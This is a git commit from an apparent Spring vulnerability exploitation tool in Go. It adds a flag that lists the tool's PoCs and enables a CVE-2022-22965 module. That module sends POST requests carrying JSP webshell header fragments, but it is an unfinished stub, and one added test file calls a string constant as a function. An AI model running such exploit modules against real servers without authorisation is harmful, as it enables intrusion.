添加show pocs list参数 输出支持pocs列表

SummerSec · SummerSec · commit df6b52dcb7f3 · 2022-05-06T16:30:31.000+08:00
diff --git a/README.md b/README.md
@@ -20,10 +20,12 @@
 * [x] 添加支持CVE-2022-22947 (Spring Cloud Gateway SpELRCE)
 * [x] 添加支持CVE-2022-22963 (Spring Cloud Function SpEL RCE)
 * [x] 添加支持CVE-2021-26084 (Atlassian Confluence RCE)
-* [ ] 添加支持CVE-2022-22965 (Spring Core RCE)
+* [x] 添加支持CVE-2022-22965 (Spring Core RCE)
 * [x] 自定义并发
 * [x] 自定义输出日志位置
 * [x] 自定义结果输出位置
+* [x] 支持自定义漏洞利用
+* [x] 支持指定ip段ex: 192.168.0.0/24
 
 ………
 
diff --git a/cmd/commons/attack/Pocslist.go b/cmd/commons/attack/Pocslist.go
@@ -0,0 +1,21 @@
+package attack
+
+import "container/list"
+
+const (
+	CVE202222963 string = "CVE202222963"
+	CVE202222965 string = "CVE202222965"
+	CVE202222947 string = "CVE202222947"
+
+	CVE202126084 string = "CVE202126084"
+)
+
+func GetList() *list.List {
+	l := list.New()
+	l.PushBack(CVE202222963)
+	l.PushBack(CVE202222965)
+	l.PushBack(CVE202222947)
+	l.PushBack(CVE202126084)
+
+	return l
+}
diff --git a/cmd/commons/attack/attack.go b/cmd/commons/attack/attack.go
@@ -35,7 +35,7 @@ func addPoc(pocs map[string]interface{}) map[string]interface{} {
 	pocs["CVE202222947"] = &_022.CVE202222947{}
 	pocs["CVE202222963"] = &_022.CVE202222963{}
 	pocs["CVE202126084"] = &_021.CVE202126084{}
-	//pocs["CVE202222965"] = &_022.CVE202222965{}
+	pocs["CVE202222965"] = &_022.CVE202222965{}
 	return pocs
 
 }
diff --git a/cmd/commons/core/options.go b/cmd/commons/core/options.go
@@ -2,6 +2,8 @@ package core
 
 import (
 	"flag"
+	"fmt"
+	"github.com/SummerSec/SpringExploit/cmd/commons/attack"
 	"github.com/SummerSec/SpringExploit/cmd/logs"
 	log "github.com/sirupsen/logrus"
 )
@@ -37,6 +39,8 @@ type Options struct {
 	Pocs string
 	// ip 段
 	IP string
+	// show pocs list
+	SP bool
 }
 
 func (o Options) toString() interface{} {
@@ -53,6 +57,7 @@ func ParseOptions() *Options {
 	flag.StringVar(&options.Proxy, "proxy", "", "proxy example: -proxy=http(socks5)://127.0.0.1:8080 ")
 	flag.BoolVar(&options.Version, "version", false, "show version")
 	flag.BoolVar(&options.Verbose, "verbose", false, "show verbose")
+	flag.BoolVar(&options.SP, "sp", false, "show pocs list")
 	flag.StringVar(&options.LogFile, "log", "", "log file example: -log=/logs/logs.txt")
 	flag.IntVar(&options.Retry, "retry", 3, "repeat request times")
 	//flag.StringVar(&options.IP, "i", "", "ip segment example: -ip=192.168.0.1/24 ")
@@ -79,6 +84,8 @@ func ParseOptions() *Options {
 	} else if options.IP != "" {
 		options.File = ""
 		options.Url = ""
+	} else if options.SP {
+		showPocsList()
 	} else {
 		//ShowBanner(v)
 		flag.PrintDefaults()
@@ -90,6 +97,15 @@ func ParseOptions() *Options {
 
 }
 
+func showPocsList() {
+	fmt.Println("Pocs list: ")
+	ls := attack.GetList()
+	// 遍历list，输出pocs名称
+	for i := ls.Front(); i != nil; i = i.Next() {
+		fmt.Println(i.Value)
+	}
+}
+
 func showVerbose(options *Options) {
 	if !options.Verbose {
 		switch options.Mode {
diff --git a/cmd/commons/poc/2022/CVE-2022-22965.go b/cmd/commons/poc/2022/CVE-2022-22965.go
@@ -0,0 +1,54 @@
+package _022
+
+import (
+	req2 "github.com/SummerSec/SpringExploit/cmd/commons/req"
+	"github.com/SummerSec/SpringExploit/cmd/commons/utils"
+	"github.com/fatih/structs"
+	"github.com/imroc/req/v3"
+	log "github.com/sirupsen/logrus"
+)
+
+type CVE202222965 struct{}
+
+func (p CVE202222965) SendPoc(target string, hashmap map[string]interface{}) {
+	//TODO implement me
+	log.Debugf("[+] Running CVE202222965 poc")
+	reqinfo := req2.NewReqInfo()
+	reqmap := structs.Map(reqinfo)
+	headers := map[string]string{
+		"suffix":     "%>//",
+		"c1":         "Runtime",
+		"c2":         "<%",
+		"User-Agent": utils.GetUA(),
+	}
+	reqmap["url"] = target
+
+	reqmap["headers"] = headers
+
+	reqmap["method"] = "POST"
+	// 默认配置
+	reqmap["timeout"] = hashmap["Timeout"].(int)
+	reqmap["retry"] = hashmap["Retry"].(int)
+	reqmap["proxy"] = hashmap["Proxy"].(string)
+	reqmap["mode"] = hashmap["Mode"].(int)
+
+	// 发送请求
+	resp := utils.Send(reqmap)
+	p.CheckExp(resp, target, hashmap["Out"].(string))
+
+}
+
+func (p CVE202222965) SaveResult(target string, file string) {
+	context := target + "   存在CVE-2022-22965漏洞\n"
+	err := utils.SaveToFile(context, file)
+	if err != nil {
+		log.Debugf("[-] Save result failed")
+		log.Debugf(err.Error())
+		return
+	}
+}
+
+func (p CVE202222965) CheckExp(resp *req.Response, target string, file string) bool {
+	//TODO implement me
+	panic("implement me")
+}
diff --git a/cmd/test/emun.go b/cmd/test/emun.go
@@ -0,0 +1,8 @@
+package main
+
+import "github.com/SummerSec/SpringExploit/cmd/commons/attack"
+
+func main() {
+	attack.CVE202222963()
+
+}

Original file line number	Diff line number	Diff line change
`@@ -35,7 +35,7 @@ func addPoc(pocs map[string]interface{}) map[string]interface{} {`
`35`	`35`	`pocs["CVE202222947"] = &_022.CVE202222947{}`
`36`	`36`	`pocs["CVE202222963"] = &_022.CVE202222963{}`
`37`	`37`	`pocs["CVE202126084"] = &_021.CVE202126084{}`
`38`		`- //pocs["CVE202222965"] = &_022.CVE202222965{}`
	`38`	`+ pocs["CVE202222965"] = &_022.CVE202222965{}`
`39`	`39`	`return pocs`
`40`	`40`
`41`	`41`	`}`